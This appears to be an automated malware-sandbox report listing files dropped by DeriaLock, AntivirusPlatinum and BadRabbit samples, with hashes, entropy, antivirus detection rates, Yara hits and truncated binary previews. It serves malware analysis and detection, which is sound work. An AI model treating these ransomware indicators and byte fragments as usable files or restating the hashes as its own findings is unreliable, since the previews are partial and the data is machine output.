                                                                                                                                                            Preview:.&..z..A....*a.7=...]......8R:.......*...F\.)...J...<U.=..7........@?.:;......>.X`{.....E...L.~s...{.]l.j..q.....'.D.Wp.0.G...>q.......^...Ma..JFB9Jrk......@^..1.l...|......uS.H.g..&..k.A..T.h....c/z'5.pk........x7).3$.Ly.CO-Z...(A$p.u`..+....G.rQ...~.(.....vB....,\y............yT.IZ.3...:6.H.#..C....c.z..`..F.\.(..[.z...=.=.&..Z....k.....6....ar...e.<L...y..lO.N.X.BZ....\.....1D...iG.....[...*2>..sR....l.....0./A.Q...P...b.A>Q../.U..45Hn..v.*..5".2...9...e.D..Jn.c....}N=..i.'*....T.w...+A.^.+.p..S.N.v.s.M..@....^C.l..b...y^.......W.j....r..@Lg...y&..9...1K...."......t.h.....jf.'..i*.xsd......@w}.Fk....n+.w.X.D...J.,....KC..+......X~..S~.O..T..XZJ...L.2o.......TT.......U..@....y.n.p. {O.j..n....1..\..5'.3...{Y!R....9r..9~l...X..RI..d......@.q...0Z.1.f.....V.R3..a.Z.....!.M..+.#j....8.H....J...7..7..ai...J....>$.......x.x.Q`..4....O..0&$...t5;.0..Z~.5....E.8ITi....2.;....I...1..V...4=...S.y.2..S...+......ly..]A. .eJ.C~......&gj.-E1).^.....!....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.804586333500998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:qwar67cTyIKhGfUyjnW2//PbebZvyDy7flplFwGenwq:qwar64TxKhWjnW0nbeV53/wv
                                                                                                                                                            MD5:20320135C3A82A99F13EE05F92B49E79
                                                                                                                                                            SHA1:1B746F99B48C637E4ED5364C8F3ED22C9A277CEB
                                                                                                                                                            SHA-256:903FC73D7E6A9C677252917976A95B69AB8AE481ED7358FC4D0E06FA115D0A64
                                                                                                                                                            SHA-512:84B16C2396C97F124FFE75ED6126CE2BA82824A2F6C1A79D7ED940BB1E36EB739A6CCEF49261CB9760AF15E6FD4569FD96C216287DBC8206CAFF18AC5F7AE7DE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.&..z..A....*a.7=...]......8R:.......*...F\.)...J...<U.=..7........@?.:;......>.X`{.....E...L.~s...{.]l.j..q.....'.D.Wp.0.G...>q.......^...Ma..JFB9Jrk......@^..1.l...|......uS.H.g..&..k.A..T.h....c/z'5.pk........x7).3$.Ly.CO-Z...(A$p.u`..+....G.rQ...~.(.....vB....,\y............yT.IZ.3...:6.H.#..C....c.z..`..F.\.(..[.z...=.=.&..Z....k.....6....ar...e.<L...y..lO.N.X.BZ....\.....1D...iG.....[...*2>..sR....l.....0./A.Q...P...b.A>Q../.U..45Hn..v.*..5".2...9...e.D..Jn.c....}N=..i.'*....T.w...+A.^.+.p..S.N.v.s.M..@....^C.l..b...y^.......W.j....r..@Lg...y&..9...1K...."......t.h.....jf.'..i*.xsd......@w}.Fk....n+.w.X.D...J.,....KC..+......X~..S~.O..T..XZJ...L.2o.......TT.......U..@....y.n.p. {O.j..n....1..\..5'.3...{Y!R....9r..9~l...X..RI..d......@.q...0Z.1.f.....V.R3..a.Z.....!.M..+.#j....8.H....J...7..7..ai...J....>$.......x.x.Q`..4....O..0&$...t5;.0..Z~.5....E.8ITi....2.;....I...1..V...4=...S.y.2..S...+......ly..]A. .eJ.C~......&gj.-E1).^.....!....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):288
                                                                                                                                                            Entropy (8bit):7.2850878919396065
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:y7BRaUG0xaCgour7OKpEBdTRAsimV+6dQtBvisuZJ9DTPWvSm5oW48:AuiMrMhhtLsUswlP8SORJ
                                                                                                                                                            MD5:5E2A32EA1F7FE7346A3BE9229262FF7C
                                                                                                                                                            SHA1:22F876D775AB46FD4B7C5060121A2E16759EB167
                                                                                                                                                            SHA-256:14E414988E25F8B49F8ABB34ED5EA8DC833B4CE0224160D17BCAFD19857C6992
                                                                                                                                                            SHA-512:0B85FF56CEABBE5B37C02FD2005E8D2A5532B6A7F0333AF3E5FE94D9DD53CB44C7544A18229647E49384815E7E09204F39FAA80970F8430BEE64BB0411EA8286
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@.....T....7(4.$Fw.='.q...R./.....f..".o...1....U.<.KJ.....K..1..DR.V..B..3.n.%.[=.......i.+S.7.}.Z..6..T6u..=.......K..
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):512
                                                                                                                                                            Entropy (8bit):7.5449424292370075
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:AuiMrMhhtGMz3j6lccB0jmybFEA+PxCX1q7NXn:LahRzT62cShbFEvW1q7tn
                                                                                                                                                            MD5:E1BC4F7581F17635F7728F1BB161F215
                                                                                                                                                            SHA1:0D8ADB6920FCFD34BB7C72CACC96129B31D540A3
                                                                                                                                                            SHA-256:0FB8C2320E0C8302910E3125CFA7A78E4DA73C7A085F04408D2ECF433A283FC7
                                                                                                                                                            SHA-512:0E4CF50EA39BECA432D189B23A7AD63929CFBD371EEB8309680930B3194763F73FC1C662ADA1DF1F5CC6AFD6EFCEDE610035178FF2ACDB986024F0A4F8A74E3A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@h...z..l..........cG....k.\z+s.9.r.G..e.tS.?.C.k..E.....Yd.......$s!..9.N.....@:G$.R.e..U.#u..v9....ln.....o.b..^........T...0.@.\...~...G.pD@|.3.Q....v......Ps.w#..#b..I(n^et.C...O..,.;>..xWK.2.{......J...6{.7"..O.....P...G..d3..?.....F.s.5...D..c2.4r(....=......h..C[..&......s....<...#3.$.....-.Q...B6.^.......k.....Q.?...ys..
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):192
                                                                                                                                                            Entropy (8bit):6.893327149057255
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:bmujdMB106RaUGtuxarLHagour7s9Kpt21DdfbGGxBLMnDQYZXfOwEG27dY+MAa5:y7BRaUG0xaCgour7OKpEBdTRAsYpmj9w
                                                                                                                                                            MD5:5A4658C7EC3539DC9E8D262637D74AD1
                                                                                                                                                            SHA1:2C8BED8B826C7980F4EDE6876A61869E1BEE0E17
                                                                                                                                                            SHA-256:317CC4C673749E23C36D12E669DF0716C3A399DFA784613A7D352033CD07359F
                                                                                                                                                            SHA-512:3A6CA4CE16C345898CE09F994B016E8FDA4EF0918FF22545B0F0C3CDB6AA182A829EB7ED445577AEF4BDAF90040EDC20BDEF2EB898BAA5B03CA18328736265AE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL...<.....\..#.2....$.<^..'`.....#.?.m`i.wZ...UW".....c.M.\.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):512
                                                                                                                                                            Entropy (8bit):7.649302351810127
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:AuiMrMhhtLtJY6DTkbS4O5gIIn4I0ieEGWeG6:LahtYYkbS4OjIpeEBeG6
                                                                                                                                                            MD5:C0F700E56FB42D222BB5F78ABCFF935A
                                                                                                                                                            SHA1:37F273D875908FABD9339E9EF9EC265BFB9C1B4E
                                                                                                                                                            SHA-256:934274994290FC22256A2F24D2D5C8BCB2DBE27A52D5B771101990C62345ABE5
                                                                                                                                                            SHA-512:986588707B690CBF0421628873BC404ADD3EA35F58D08F0CBCDA14A176A65ECD757748508638798B56CE07757BE0F1C86EC80168E9557384147B485EE0D3C7BA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@.\.7.K.4d.wuFbi....*..@;.o..x.T....9q\#}.....6.z........vs.!yc2...Y.v.C&.%..<.S.jAc......P^....l..3..R.N.X?....wd...#kD.l+.........}."....2O.G..M....e......W..<`r>.5df.Wi.r...J..7c.D..... ......S..#.'.......9.)W..0K..W..c`K_...~........t...f3H\....u,d=./.Z..27!.(%..X..m...xEx.......)..o..J....H5...<.,3n.P.C...._`.F..q^3...z).6.H..bu
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):512
                                                                                                                                                            Entropy (8bit):7.579816221244999
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:AuiMrMhhtHGc9J1ds0nXvsgUcZsWUF8fsEg7FZ:Lah71ds0nUgUcZsWHfU7r
                                                                                                                                                            MD5:555FB7D927058E7FA5A588A84CD43F51
                                                                                                                                                            SHA1:BE4B856C1BCCDD3175D2096127B582306BB75D09
                                                                                                                                                            SHA-256:B20CCF1C189A072D9DAB6E4B96F43E256C14943E9B6A0E67CB3A319C203C77D9
                                                                                                                                                            SHA-512:6212DF00BD8DEEF1CC866DD6444E0A1ACE9F284ABDD5632D6B0D060F96A13BB5838C42193B93534E66B4E643CFF1E03179103266C36B5832926D88FDE4A30290
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@..Wt.D.D. ..sD......".....2l\...^....y.K`!1...-...q..$..yx.c..~....Kb...zMI.. }.2t......N.Vx..iRa..|........i5|..uc..3......J.V<..m........G..Mg. ..#.......6.(x.=+....hD..e$.1N.."g..........5..z........!.1....f.~P!.^U.h.<v.!s.iy....pOH.c.....Y..$=..-..|R...v.D......<.O...~..~&+..1..k)U.....38.Z..`z...(....c..\.Eg....d.......*.a@.<...!
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):22528
                                                                                                                                                            Entropy (8bit):7.6355330409141144
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:fIiV728hUQ7Y2P/cVEccDdye7kjlWLe7grPiA8jyrMPhTjanbBoZht0MZaNJawcM:fRGuY2P0Vo6r7SiAwyrMRjbSMcnbcuy8
                                                                                                                                                            MD5:8703FF2E53C6FD3BC91294EF9204BACA
                                                                                                                                                            SHA1:3DBB8F7F5DFE6B235486AB867A2844B1C2143733
                                                                                                                                                            SHA-256:3028A2B0E95143A4CAA9BCD6AE794958E7469A20C6E673DA067958CBF4310035
                                                                                                                                                            SHA-512:D5EB8A07457A78F9ACD0F81D2F58BBF64B52183318B87C353A590CD2A3AC3A6EC9C1452BD52306C7CF99F19B6A897B16CEB8289A7D008C5CE3B07EDA9B871204
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 52%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$+.I...............2.P........................@.................................................................................................................................................................................................UPX0....................................UPX1.....P.......N..................@....rsrc................P..............@...3.03.UPX!....4.|.....m...s@......&......40...s..*..B]h.F.B.x....../G..03..s.P..b.V..Y4+l.....N..]t#.o.W;..$nl1...+....y...[.j..[..a..;.. 5..6...O"...{_../o.&..W..R..`./Ch.l.C./.|....q.r.........-.{.C.q.>..R*d................8..*X4}....!V...DL.I!lF...kp..5...h.5.3....4.8Q...T.....=...Y..%.&~.6...{...r.\.8=.....-.`.ud..G..%...4.40)z._..BA....}.P.frd.y...^ wkxS......u.(.-tp..&.....@..%....1.r*..X..WQ....r...#.mC...@..|;.].T.|...uYm.J......S1..N....'b.%]i..c.J.I'p.CPp...n...q..
                                                                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):62328
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3::
                                                                                                                                                            MD5:C7CA77D847F1802502EF3B9228D388E4
                                                                                                                                                            SHA1:80AB09116D877B924DFEC5B6E8EB6D3DDE35869E
                                                                                                                                                            SHA-256:FDEF2F6DA8C5E8002FA5822E8E4FEA278FBA66C22DF9E13B61C8A95C2F9D585F
                                                                                                                                                            SHA-512:B5C23209597ECDDBCDE6CD8E72392721C3C2848385AD3F4C644024979F777FD11F2DD19E763F443C4759BB339B047034997FB06566CE7D4574CF3E4B75F51B7D
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):609584
                                                                                                                                                            Entropy (8bit):6.089159959275534
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:LUVJnkkCKDCUUgdxxnwH8aYvR4+NyEFVUmJ8ts:QvknYJ4xEFCmuu
                                                                                                                                                            MD5:821511549E2AAF29889C7B812674D59B
                                                                                                                                                            SHA1:3B2FD80F634A3D62277E0508BEDCA9AAE0C5A0D6
                                                                                                                                                            SHA-256:F59CDF89F0F522CE3662E09FA847BCA9B277B006C415DCC0029B416C347DB9C4
                                                                                                                                                            SHA-512:8B2E805B916E5FBFCCCB0F4189372AEA006789B3847B51018075187135E9B5DB9098F704C1932623F356DB0EE327E1539A9BF3729947E92844A26DB46555E8CD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 4%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......4....N&.....#.....2...........=.......@....+ .........................`.......................................*.......+..:....p...............9.. .......p_...+..................................................d............................text....0.......2.................. ..`.data...8....P.......8..............@....rsrc........p.......V..............@....reloc..p_.......`..................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):2.7400180623698036
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:y1Kr52lGbb7kU9b7kEreb7klQb7kTb7kbIl9lWYb7k0tplib7kub7kAb7kwDZb7L:D2w0U90x0q0T0U9cY0Cli0u0A0GZ09O
                                                                                                                                                            MD5:F3904137753B8233C2DC73EA2BF9B15F
                                                                                                                                                            SHA1:B5008F80F74B0C26095FD39AEE48F80EEF145668
                                                                                                                                                            SHA-256:0526B5CC260207F787FB12C68F407C5B1F608861E565373536B34AD7BB4AF4BF
                                                                                                                                                            SHA-512:5169CEE0C0617DDF86AAE4DD3BC26AF9D6AF1EA840639967118C00A4947E6990DB07538F5E56613F515577C4B600DF8C5B465CB4F1A9518D277F4BF9F22D8AFE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:....................................................!...........................\... ....!.......................B.........L...Zb....... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.................................................................... ........L...........E.C.C.B.1.7.5.F.-.1.E.B.2.-.4.3.D.A.-.B.F.B.5.-.A.8.D.5.8.A.4.0.A.4.D.7...C.:.\.W.i.n.d.o.w.s.\.l.o.g.s.\.w.a.a.s.m.e.d.i.c.\.w.a.a.s.m.e.d.i.c...2.0.2.2.0.9.2.9._.2.1.4.4.5.7._.2.7.9...e.t.l.............P.P.\... ....!..................................................................9.B..!......17134.1.amd64fre.rs4_release.180410-1804............5.@..!......OYo."(.s..O........WaaSMedicSvc.pdb............................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1066176
                                                                                                                                                            Entropy (8bit):6.377536905123536
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:K2woQX9+gWX6b+SHQjxnRC33Oej3zR/QhF7OnVz3S7HM7BHg:5kX9+V6KTpcPhkgVSglg
                                                                                                                                                            MD5:714CF24FC19A20AE0DC701B48DED2CF6
                                                                                                                                                            SHA1:D904D2FA7639C38FFB6E69F1EF779CA1001B8C18
                                                                                                                                                            SHA-256:09F126E65D90026C3F659FF41B1287671B8CC1AA16240FC75DAE91079A6B9712
                                                                                                                                                            SHA-512:D375FD9B509E58C43355263753634368FA711F02A2235F31F7FA420D1FF77504D9A29BB70AE31C87671D50BD75D6B459379A1550907FBE5C37C60DA835C60BC1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 4%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."x$9.....@.....#.........l...... ........p....X'.........................P.......................................@...............P...Z.........../...............................................................................................text............................... ..`.data....s.......r..................@....rsrc...4\...P...^...6..............@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):9062
                                                                                                                                                            Entropy (8bit):3.1712145740481574
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:cY+38+DJ5+inJg3+igJU+LY+XY+ntn+E5L+M4m+h7:j+s+j+j3+12+0+I+9+C+y+9
                                                                                                                                                            MD5:1892ADA8F362C898339AFAD26EC005CC
                                                                                                                                                            SHA1:9F8D04444C6255F26EBDE3D8FCD3F86A1077F00F
                                                                                                                                                            SHA-256:3FA64158A1388700535BA509EE4F60DE16B8E296F8ED598705743F453EA67F32
                                                                                                                                                            SHA-512:6CBA5A64E2E4FC6152D8527BD5FBD4F964AEA0F0B210CA2D7A3BE13561CF8BC5D4FEB3DEA0BC2D548F16E44B9A8F08D7A835052A633014E747DABD86D0A26CF7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):9728
                                                                                                                                                            Entropy (8bit):6.687856479733953
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:bypFwq/1Z6LKAVkPTDtlkZkH7KtkbT/zRAtO7/G97+vHiu9:bryfAVkvtSZkWaAtpxA9
                                                                                                                                                            MD5:CD1800322CCFC425014A8394B01A4B3D
                                                                                                                                                            SHA1:171073975EFFDE1C712DFD86309457FD457AED33
                                                                                                                                                            SHA-256:8115DE4AD0B7E589852F521EB4260C127F8AFEAA3B0021BFC98E4928A4929AC0
                                                                                                                                                            SHA-512:92C22C025FD3A61979FA718BF2E89A86E51BF7E69C421A9534FBF9C2D5B23B7A9224D0E9F3E0501992038837015214D1EF73B532A68B7D19DE559C9AB9C6E5F6
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*...*...*...6...*...5...*..t5...*..Rich.*..................PE..L...].;K................. ..........0.............@.........................................................................L...........L...........................................................................................................UPX0....................................UPX1..... ..........................@....rsrc................ ..............@..............................................................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):210632
                                                                                                                                                            Entropy (8bit):6.677691827536191
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:zCBsPmcx7BTn/irEsrDUxo2vYsWwYEJOXKVviEWuwlVBgzUMqqDLW+z3AHW5:8sPnBT/irETNWiJOXKVvKBgz3qqDL1zt
                                                                                                                                                            MD5:EDB72F4A46C39452D1A5414F7D26454A
                                                                                                                                                            SHA1:08F94684E83A27F2414F439975B7F8A6D61FC056
                                                                                                                                                            SHA-256:0B2F863F4119DC88A22CC97C0A136C88A0127CB026751303B045F7322A8972F6
                                                                                                                                                            SHA-512:D62A19436ABA8B2D181C065076B4AB54D7D8159D71237F83F1AFF8C3D132A80290AF39A8142708ACB468D78958C64F338BA6AD0CAB9FBAC001A6A0BDDC0E4FAA
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: INDICATOR_TOOL_ENC_DiskCryptor, Description: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions, Source: C:\Windows\cscc.dat, Author: ditekSHen
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............~...~...~...~..~.....w.~..x...~..x....~..#...~..#....~..#....~.Rich..~.................PE..d...9.S.........."......\...........0.......................................p............. .................................................0..P....P....... ...............`..t...0d...............................................`..(............................text...WI.......J.................. ..h.rdata...|...`...~...N..............@..H.data....0......."..................@....pdata....... ......................@..HINIT.........0...................... ....rsrc........P......................@..B.reloc..L....`......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):142848
                                                                                                                                                            Entropy (8bit):6.314365095327337
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:1keK/MwGT0834YW3pvyh8fcl/iL62iL6KK:Sn/MZd4YW3pvyxl/ini
                                                                                                                                                            MD5:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                                                                                                                                            SHA1:AFEEE8B4ACFF87BC469A6F0364A81AE5D60A2ADD
                                                                                                                                                            SHA-256:8EBC97E05C8E1073BDA2EFB6F4D00AD7E789260AFA2C276F0C72740B838A0A93
                                                                                                                                                            SHA-512:F5DCBF3634AEDFE5B8D6255E20015555343ADD5B1BE3801E62A5987E86A3E52495B5CE3156E4F63CF095D0CEDFB63939EAF39BEA379CCAC82A10A4182B8DED22
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                                                                                                                                            • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                            • Antivirus: Metadefender, Detection: 86%, Browse
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........sR.. R.. R.. I-. v.. I-$ F.. I-. &.. [.9 Q.. [.) C.. R.. ... I-. _.. I- S.. I-' S.. RichR.. ................PE..L...e..Y............................Ug.......0....@.................................a[....@.................................._..........,............................................................[..@............0...............................text...J........................... ..`.rdata..<@...0...B..................@..@.data...,]...........`..............@....rsrc...,............z..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@BadRabbit.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):410760
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3::
                                                                                                                                                            MD5:C4F26ED277B51EF45FA180BE597D96E8
                                                                                                                                                            SHA1:E9EFC622924FB965D4A14BDB6223834D9A9007E7
                                                                                                                                                            SHA-256:14D82A676B63AB046AE94FA5E41F9F69A65DC7946826CB3D74CEA6C030C2F958
                                                                                                                                                            SHA-512:AFC2A8466F106E81D423065B07AED2529CBF690AB4C3E019334F1BEDFB42DC0E0957BE83D860A84B7285BD49285503BFE95A1CF571A678DBC9BDB07789DA928E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):7
                                                                                                                                                            Entropy (8bit):2.2359263506290326
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:t:t
                                                                                                                                                            MD5:F1CA165C0DA831C9A17D08C4DECBD114
                                                                                                                                                            SHA1:D750F8260312A40968458169B496C40DACC751CA
                                                                                                                                                            SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                                                                                                                                                            SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:Ok.....
